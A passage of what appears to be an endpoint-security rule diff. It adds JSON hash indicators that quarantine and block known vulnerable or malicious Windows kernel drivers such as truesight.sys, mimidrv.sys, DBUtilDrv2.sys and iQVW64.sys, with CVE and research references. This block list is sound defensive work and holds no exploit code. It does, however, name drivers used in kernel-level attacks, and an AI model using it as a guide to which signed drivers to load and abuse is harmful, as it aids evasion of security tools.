"7906e164394dcbf1e06cc8001a5f1ddd6c479029e37c65ff5636796be1fac135", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3cfc893a-a638-5270-bd66-ed199be912da", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821757Z", + "creation_date": "2026-03-23T11:45:30.821760Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821769Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3f3684a37b2645fa6827943d9812ffc2d83e89e962935b29874bec7c3714a06f", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d02f2ea-81af-596c-be07-750c5d09c798", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495818Z", + "creation_date": "2026-03-23T11:45:31.495820Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495825Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5df98d47f1c72157d3cac0a499296e2e5b741f5aed7aca9134e1952a39dbb55a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller 
(v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d0af958-0118-59a2-bc4a-dc1535b48e0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820106Z", + "creation_date": "2026-03-23T11:45:30.820108Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820113Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "717242ad6a3afb6f236890caa44501a4be8d0ab019f028ba2c74d3455f065804", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d0dea25-74ee-567c-8db2-be53fe771af9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974644Z", + "creation_date": 
"2026-03-23T11:45:29.974646Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974652Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af45d91fefd4dfffda0ce70957a542b68775368432e52d20dfdf0fc159495c7f", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d0f4486-53c2-5f01-9083-611db0bd78e8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478802Z", + "creation_date": "2026-03-23T11:45:31.478805Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478815Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6981813c6d68c56fcb1366a57dd34a2f73c365043dcc7d64efb51db3fcff7147", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"3d367f93-5778-50ad-83e8-f6ae9e3f1afd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615203Z", + "creation_date": "2026-03-23T11:45:29.615205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615210Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "745273e1620bc657d2210ae1b5abb49f4f5928829f95c8ef01ce151bdbb4c32f", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d3699b0-31c0-5840-a3f7-e6e7406dc53c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967826Z", + "creation_date": "2026-03-23T11:45:29.967830Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.967838Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74b432289de1302c53356b92ebebc0ac92e8159ab7746444e1ac85f7e90cd28e", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d38e0f2-c4b2-5389-8a4a-32303f611b71", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488845Z", + "creation_date": "2026-03-23T11:45:31.488847Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488853Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "02ac34d10a3e72c1fec7ebce30cd20db595bf45efe7e8cde888d2dcfc56dca9a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d3b0db9-7403-5a3b-abce-6c10bdad3f64", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620745Z", + "creation_date": "2026-03-23T11:45:29.620747Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620752Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d50a747-b61a-59be-a6d4-17147b52a401", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468461Z", + "creation_date": "2026-03-23T11:45:30.468464Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468472Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "edf05640ad7caa10756cc4163e926de74157da1d81b4d245b602a36f4c8cb4d0", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d61eae8-4969-59fd-8ba2-f3eb89410789", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453431Z", + "creation_date": "2026-03-23T11:45:30.453435Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453444Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c4f56281d762bfaeb2168c13f3349611c8e3443602d2015540a742d6e79e6bc", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d679b27-70a2-5176-8a0b-1e178d0087a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491706Z", + "creation_date": "2026-03-23T11:45:31.491709Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491719Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a33b8de796951d3140ce8441be03c748fad27efb1eed5ececd9ce5cc1c9d38c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d91cf19-1299-5782-9365-96483f8bbc75", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480493Z", + "creation_date": "2026-03-23T11:45:31.480497Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480507Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ecec4fe9e9cbc648b7fb4ebec945268f5f1e2a73cf07efb3c29d67c4fe685a2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d978851-0b46-5ed2-9399-d8641158f61b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480064Z", + "creation_date": "2026-03-23T11:45:30.480066Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480071Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "68105d0f74ab436d36a741095d9ac08b8316e926727d59f3fe874395b291615c", + "comment": "Vulnerable Kernel Driver (aka iscflashx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3d983f17-85c1-5f33-aaae-e0fa398f14af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159457Z", + "creation_date": "2026-03-23T11:45:31.159458Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9d59246ccbe367e762c60a6dc64ccbca2afed2e3d48339dd461c8736c643a521", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3dbe74ce-1467-51e2-8144-6ed163467f23", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816155Z", + "creation_date": "2026-03-23T11:45:30.816157Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816163Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ad8c38f6e0ca6c93abe3228c8a5d4299430ce0a2eeb80c914326c75ba8a33f9", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3dc19227-8e27-5bc3-ac0c-f517ef56d5b0", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983229Z", + "creation_date": "2026-03-23T11:45:29.983231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983236Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009", + "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3dc4b816-2c71-5a94-b3b3-d2158adac29b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822980Z", + "creation_date": "2026-03-23T11:45:30.822982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822987Z", 
+ "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a0dbcf82dc346a49a816b3a6283392c9f2531661e460072ba063be898e5cbda0", + "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3dcacc0c-d480-55a3-9be8-e54d40288aa9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144075Z", + "creation_date": "2026-03-23T11:45:32.144077Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144082Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2cd7a0c4e8d24404c92e4ed8539b2136028a8ca663f3432e417b00665493e13f", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3dcc9676-b2d7-5d49-a9d7-1a62bf86854c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606865Z", + "creation_date": "2026-03-23T11:45:29.606867Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606889Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a4e4ee169fe0f1f079e5f5c1da38ea70fe717e728faf054deb180f9e37fe574", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ddb26a4-3ffd-5213-9fc0-158a00d10dc8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457661Z", + "creation_date": "2026-03-23T11:45:30.457664Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457673Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3308899fc0ebdd04a4dacc386873c25dabe32a8f34607fb335148d2dab667d8", + "comment": "Vulnerable Kernel Driver (aka 
rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3df076fe-5644-585b-8486-7e476582899c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499322Z", + "creation_date": "2026-03-23T11:45:31.499325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499334Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "976eb2b6361c0bec3954b294089e2263084509848381b6ded0d75e87ca074875", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3df50ee6-7969-52d4-8e89-b4d961f4c386", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972160Z", + 
"creation_date": "2026-03-23T11:45:29.972162Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972167Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff115cefe624b6ca0b3878a86f6f8b352d1915b65fbbdc33ae15530a96ebdaa7", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3dfc5d0f-a4da-5a5a-9899-2551aa4abf09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827963Z", + "creation_date": "2026-03-23T11:45:31.827964Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827970Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9efaad2e2089820dc5726e358fa731ba7788d88f8fe1fc243c3afd4cb5fe89dc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
